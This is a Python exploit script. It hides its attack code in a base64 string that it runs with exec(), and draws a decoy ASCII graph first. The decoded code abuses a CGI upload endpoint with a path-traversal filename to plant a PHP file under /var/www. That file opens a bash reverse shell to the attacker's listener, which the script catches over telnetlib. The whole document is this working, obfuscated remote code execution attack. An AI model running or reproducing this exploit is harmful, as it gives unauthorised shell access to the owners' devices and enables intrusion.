/>from time import sleep#---------- ----------------------------<br />import threading#----------------- ---------------------------<br />import telnetlib#------------------ --------------------------<br />import requests#-------------------- -------------------------<br />import socket#----------------------- ------------------------<br />import base64#------------------------ -----------------------<br />import time#--------------------------- ----------------------<br />import sys#----------------------------- ---------------------<br />import re#------------------------------- 
--------------------<br />importer = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+ "SYWRpb1N0YXI6DQog"<br />importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+ "KHNlbGYpOg0KICAg"<br />importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+ "D0gIkRqL09sZSIN"<br />importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+ "0gTm9uZQ0KICAg"<br />importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+ "NCiAgICAgICAg"<br />importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+ "gICAgc2VsZi5s"<br />importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+ "VsZi5scG9ydCA9"<br />importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+ "XJncyhzZWxmKToN"<br />importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+ "cmd2KSAhPSA0Og0K"<br />importer += "ICAgICAgICAgICAgc2VsZi50aGV"+ "fdXNhZ2UoKQ0KICAg"<br />importer += "ICAgICBlbHNlOg0KICAgICAgIC"+ "AgICAgc2VsZi5yaG9z"<br />importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+ "CAgICAgICAgICBzZWxm"<br />importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+ "Ml0NCiAgICAgICAgICAg"<br />importer += "IHNlbGYubHBvcnQgPSBpbnQ"+ "oc3lzLmFyZ3ZbM10pDQog"<br />importer += "ICAgICAgICAgICBpZiBub3"+ "QgImh0dHAiIGluIHNlbGYu"<br />importer += "cmhvc3Q6DQogICAgICAgI"+ "CAgICAgICAgc2VsZi5yaG9z"<br />importer += "dCA9ICJodHRwOi8ve30i"+ "LmZvcm1hdChzZWxmLnJob3N0"<br />importer += "KQ0KDQogICAgZGVmIHR"+ "oZV91c2FnZShzZWxmKToNCiAg"<br />importer += "ICAgICAgc2VsZi50aG"+ "Vfd2hhKCkNCiAgICAgICAgcHJp"<br />importer += "bnQoIlVzYWdlOiBwe"+ "XRob24ge30gW3RhcmdldElQOnRh"<br />importer += "cmdldFBPUlRdIFts"+ "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"<br />importer += "Ii5mb3JtYXQoc3l"+ "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"<br />importer += "eGl0KDApDQoNCi"+ "AgICBkZWYgdGhlX3doYShzZWxmKToN"<br />importer += "CiAgICAgICAgd"+ "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"<br />importer += "X19fX18gIF9f"+ "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"<br />importer += "X19uDQogICA"+ "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"<br />importer += "CiAgICAgIC"+ "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"<br />importer += "ICAgIDBcL"+ "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"<br />importer += "IFwuX19f"+ "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"<br 
/>importer += "eF9fX18"+ "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"<br />importer += "ICxeLi"+ "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"<br />importer += "IGBpD"+ "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"<br />importer += "CiAg"+ "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"<br />importer += "ICAg"+ "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"<br />importer += "L18vI"+ "CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"<br />importer += "ICAgIC"+ "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"<br />importer += "fn5+fn5"+ "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"<br />importer += "IiIiDQog"+ "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"<br />importer += "ZWYgdGhl"+ "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"<br />importer += "bnQoIldy"+ "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"<br />importer += "ICAgICAg"+ "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"<br />importer += "eXBlIiA6"+ "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"<br />importer += "uZGFyeT0"+ "tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"<br />importer += "CAgICAgI"+ "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"<br />importer += "iA6ICJlb"+ "i1VUyxlbjtxPTAuOSIsDQogICAgICA"<br />importer += "gICAgICA"+ "gICAgICAgICAgICAiQWNjZXB0LUV"<br />importer += "uY29kaW5"+ "nIiA6ICJnemlwLCBkZWZsYXRlI"<br />importer += "iwNCiAgI"+ "CAgICAgICAgICAgICAgICAgI"<br />importer += "CAgICJVc"+ "2VyLUFnZW50IiA6IHNlbGY"<br />importer += "uc2VjcmV"+ "0YWdlbnQsDQogICAgICA"<br />importer += "gICAgICAg"+ "ICAgICAgICAgICAiQ2Fj"<br />importer += "aGUtQ29udH"+ "JvbCIgOiAibWF4LWFnZT"<br />importer += "0wIiwgDQogI"+ "CAgICAgICAgICAgICAgI"<br />importer += "CAgICAgICAiQ2"+ "9ubmVjdGlvbiIgOiAiY2"<br />importer += "xvc2UiLA0KICAgI"+ "CAgICAgICAgICAgICAgI"<br />importer += "CAgICAgIkFjY2VwdC"+ "IgOiAiKi8qIn0NCiAgIC"<br />importer += "ANCiAgICAgICAgc2VsZ"+ "i5wYXlsb2FkID0gIjw/c"<br />importer += "GhwIGV4ZWMoXCIvYmluL2"+ "Jhc2ggLWMgJ2Jhc2ggLWk"<br />importer += "gPiAvZGV2L3RjcC8iK3Nlb"+ "GYubGhvc3QrIi8iK3N0cih"<br />importer += "zZWxmLmxwb3J0KSsiIDwmM"+ "TtybSBiLnBocCdcIik7Ig0"<br />importer += "KDQogICAgICAgIHNlbGYuZ"+ 
"GVwbG95ICA9ICItLS0tLS1"<br />importer += "UaGVNZW51XHJcbkNvbnRlbn"+ "QtRGlzcG9zaXRpb246IGZ"<br />importer += "vcm0tZGF0YTsiI3VzDQogICA"+ "gICAgIHNlbGYuZGVwbG9"<br />importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+ "bGVcIjsgZmlsZW5hbWU"<br />importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+ "i8iI01lDQogICAgICA"<br />importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+ "92YXIvd3d3L2IucGh"<br />importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+ "hcHBsaWNhdGlvbi8"<br />importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+ "bG95ICs9ICJvY3R"<br />importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+ "i5wYXlsb2FkKyJ"<br />importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+ "AgIHNlbGYuZGV"<br />importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+ "0LURpc3Bvc2l"<br />importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+ "I24NCiAgICA"<br />importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+ "FwiXHJcblx"<br />importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+ "1cclxuIiM"<br />importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+ "zdHMucG9"<br />importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+ "YWQuY2d"<br />importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+ "GE9c2V"<br />importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+ "ANCiA"<br />importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+ "rIi9"<br />importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+ "Zik"<br />importer += "6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+ "mV"<br />importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+ "F"<br />importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+ "A"<br />importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+ "9"<br />importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+ "iA"<br />importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+ "bmV"<br />importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+ "hbmR"<br />importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+ "xwb3J"<br />importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+ "XQoc29"<br />importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+ "UkVBTSk"<br 
/>importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+ "sIHNlbGY"<br />importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+ "VlOg0KICA"<br />importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+ "CAgICAgIHM"<br />importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+ "ICAgICAgIHM"<br />importer += "ubGlzdGVuKDEpDQogICAgICAgICAgICA"+ "gICAgY29ubiw"<br />importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+ "AgICAgICAgICA"<br />importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+ "m9tIHt9Ont9Ii5"<br />importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+ "XSkpDQogICAgICA"<br />importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+ "jayA9IGNvbm4NCiA"<br />importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+ "NrZXQudGltZW91dCB"<br />importer += "hcyBwOg0KICAgICAgICAgICAgI"+ "CAgIHByaW50KCJIbW1"<br />importer += "tICh7bXNnfSkiLmZvcm1hdCht"+ "c2c9cCkpDQogICAgICA"<br />importer += "gICAgICAgICAgcy5jbG9zZSg"+ "pDQogICAgICAgICAgICA"<br />importer += "gICAgZXhpdCgwKQ0KICAgIC"+ "AgICAgICAgYnJlYWsNCg0"<br />importer += "KICAgICAgICBwcmludCgiW"+ "W91IGdvdCBzaGVsbC4iKQ0"<br />importer += "KICAgICAgICB0ZWxuZXR1"+ "cy5pbnRlcmFjdCgpDQogICA"<br />importer += "gICAgIGNvbm4uY2xvc2U"+ "oKQ0KDQogICAgZGVmIG1haW4"<br />importer += "oc2VsZik6DQogICAgIC"+ "AgIHNlbGYudGhlX2FyZ3MoKQ0"<br />importer += "KICAgICAgICBzZWxmL"+ "nRoZV9zdWJwKCkNCg0KaWYgX19"<br />importer += "uYW1lX18gPT0gJ19f"+ "bWFpbl9fJzoNCiAgICBWaWRlb0t"<br />importer += "pbGxlZFRoZVJhZGl"+ "vU3RhcigpLm1haW4oKQ0K"######"<br />retropmi = "U2VjdXJpdHkgaXM"+ "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"<br />retropmi += "cmUgbGF5ZXJzIH"+ "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"<br />retropmi += "dGlua3Mu"####"+ "###############################"<br /><br />radio_code = base64.b64decode(importer)<br /><br />curves = [ord(c) for c in retropmi]<br /><br />maxi = max(curves)<br />mini = min(curves)<br />code_range = maxi - mini<br /><br />jcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]<br /><br />for y in range(20, 0, -1):<br /> line = ""<br /> for x in range(len(jcoords)):<br /> if 
jcoords[x] >= y:<br /> line += "-"<br /> else:<br /> line += " "<br /> print(line)<br /> time.sleep(0.03/1.337)<br /><br />exec(radio_code)<br /></code></pre>